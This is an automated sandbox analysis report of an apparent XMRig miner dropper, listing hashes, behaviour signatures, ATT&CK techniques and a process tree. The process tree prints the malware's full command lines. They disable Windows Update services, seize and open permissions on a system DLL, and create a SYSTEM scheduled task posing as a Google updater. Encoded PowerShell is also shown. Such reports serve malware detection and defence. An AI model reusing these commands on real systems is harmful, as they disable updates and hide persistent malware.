Analysis

  • max time kernel
    300s
  • max time network
    300s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    01-07-2022 04:47

General

  • Target

    5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7.exe

  • Size

    7.4MB

  • MD5

    26e4e44c3ba14cdaf5a9994192aaf2a5

  • SHA1

    1422aa1e3462da9cf4d96e3ade9310b383c40ebb

  • SHA256

    5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7

  • SHA512

    18babf7c5ee51848061cff36ffdbab814bf5f6404d067ddd48f16cb168a99a7964c6a6b49cd1e44f222c77527eed2736946ec7bdd484271d243efdf7c51903ad

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 2 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7.exe
    "C:\Users\Admin\AppData\Local\Temp\5ef59e1cbe41a8d919a0a8e525652ab435e67f8a0ae3758a21dc25403011bda7.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2648
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:5008
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4588
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:5088
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4928
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:204
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:1876
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:3924
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:3728
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:4564
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:2144
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:4576
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:4796
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:4880
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:4948
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:4924
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:2080
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:372
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:3904
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:3948
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:4020
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:2020
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:4456
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:3992
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:5112
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:4964
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:5028
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:4928
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:2664
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3344
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2228
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2680
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4352
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1608
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                        4⤵
                          PID:4892
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                            5⤵
                            • Creates scheduled task(s)
                            PID:3616
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                          4⤵
                            PID:1892
                            • C:\Windows\system32\schtasks.exe
                              schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              5⤵
                                PID:3848
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "
                          2⤵
                          • Drops startup file
                          PID:4952
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "
                          2⤵
                          • Checks computer location settings
                          PID:5004
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                        1⤵
                        • Drops file in Windows directory
                        • Modifies Internet Explorer settings
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:4476
                      • C:\Windows\system32\browser_broker.exe
                        C:\Windows\system32\browser_broker.exe -Embedding
                        1⤵
                        • Modifies Internet Explorer settings
                        PID:4224
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Modifies registry class
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:324
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Drops file in Windows directory
                        • Modifies Internet Explorer settings
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2860
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4832
                      • C:\Program Files\Chrome\updater.exe
                        "C:\Program Files\Chrome\updater.exe"
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:2660
                        • C:\Windows\System32\conhost.exe
                          "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                          2⤵
                          • Drops file in Drivers directory
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Drops file in Program Files directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5108
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
                            3⤵
                              PID:604
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -EncodedCommand "PAAjAHkAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
                                4⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2132
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                              3⤵
                                PID:4628
                                • C:\Windows\system32\sc.exe
                                  sc stop UsoSvc
                                  4⤵
                                  • Launches sc.exe
                                  PID:3828
                                • C:\Windows\system32\sc.exe
                                  sc stop WaaSMedicSvc
                                  4⤵
                                  • Launches sc.exe
                                  PID:3624
                                • C:\Windows\system32\sc.exe
                                  sc stop wuauserv
                                  4⤵
                                  • Launches sc.exe
                                  PID:3992
                                • C:\Windows\system32\sc.exe
                                  sc stop bits
                                  4⤵
                                  • Launches sc.exe
                                  PID:2788
                                • C:\Windows\system32\sc.exe
                                  sc stop dosvc
                                  4⤵
                                  • Launches sc.exe
                                  PID:2664
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4684
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4652
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4888
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                  4⤵
                                  • Modifies registry key
                                  PID:2104
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                  4⤵
                                  • Modifies registry key
                                  PID:2228
                                • C:\Windows\system32\takeown.exe
                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:2192
                                • C:\Windows\system32\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:2232
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:2916
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4240
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4612
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4120
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                  4⤵
                                    PID:4712
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                    4⤵
                                      PID:4812
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                      4⤵
                                        PID:876
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                        4⤵
                                          PID:4660
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                          4⤵
                                            PID:384
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                            4⤵
                                              PID:924
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                              4⤵
                                                PID:3492
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                              3⤵
                                                PID:5080
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-ac 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4456
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-dc 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4140
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-ac 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2620
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-dc 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3352
                                              • C:\Windows\System32\conhost.exe
                                                C:\Windows\System32\conhost.exe
                                                3⤵
                                                  PID:5096
                                                  • C:\Windows\System32\conhost.exe
                                                    "C:\Windows\System32\conhost.exe" "mjadcdpvfkxx"
                                                    4⤵
                                                      PID:656
                                                  • C:\Windows\explorer.exe
                                                    C:\Windows\explorer.exe mkapcxrks1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                    3⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4524
                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                1⤵
                                                • Modifies registry class
                                                PID:4572
                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                1⤵
                                                • Modifies registry class
                                                PID:2144

                                              Network

                                              MITRE ATT&CK Matrix ATT&CK v6

                                              Execution

                                              Scheduled Task

                                              1
                                              T1053

                                              Persistence

                                              Modify Existing Service

                                              2
                                              T1031

                                              Scheduled Task

                                              1
                                              T1053

                                              Privilege Escalation

                                              Scheduled Task

                                              1
                                              T1053

                                              Defense Evasion

                                              Modify Registry

                                              3
                                              T1112

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              Impair Defenses

                                              1
                                              T1562

                                              File Permissions Modification

                                              1
                                              T1222

                                              Discovery

                                              Query Registry

                                              3
                                              T1012

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              System Information Discovery

                                              4
                                              T1082

                                              Impact

                                              Service Stop

                                              1
                                              T1489

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e5373f1e2c782659695c5cea587fddea

                                                SHA1

                                                4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                SHA256

                                                c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                SHA512

                                                2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e5373f1e2c782659695c5cea587fddea

                                                SHA1

                                                4dc9dbcff89a50d1c75f956fb7d712d1d6181335

                                                SHA256

                                                c58788efe269e6cc57076e59cb2954c4fb791074353e091217a4b78a62592712

                                                SHA512

                                                2c42080ce4411e1ad81f1187992d649c0b057db87919785029368ed47d79d1507da9073f29522c0cc4539a2b87508dd89572efa53c0d9ee7a4052aa579517b79

                                              • C:\Windows\Temp\lol.bat
                                                Filesize

                                                59B

                                                MD5

                                                f580e0e80cc87b25e38ea2c0c8059d04

                                                SHA1

                                                299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                SHA256

                                                9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                SHA512

                                                5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                              • C:\Windows\Temp\run.bat
                                                Filesize

                                                98B

                                                MD5

                                                731afe244b2414169a5f630d52646e56

                                                SHA1

                                                e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                SHA256

                                                6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                SHA512

                                                84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

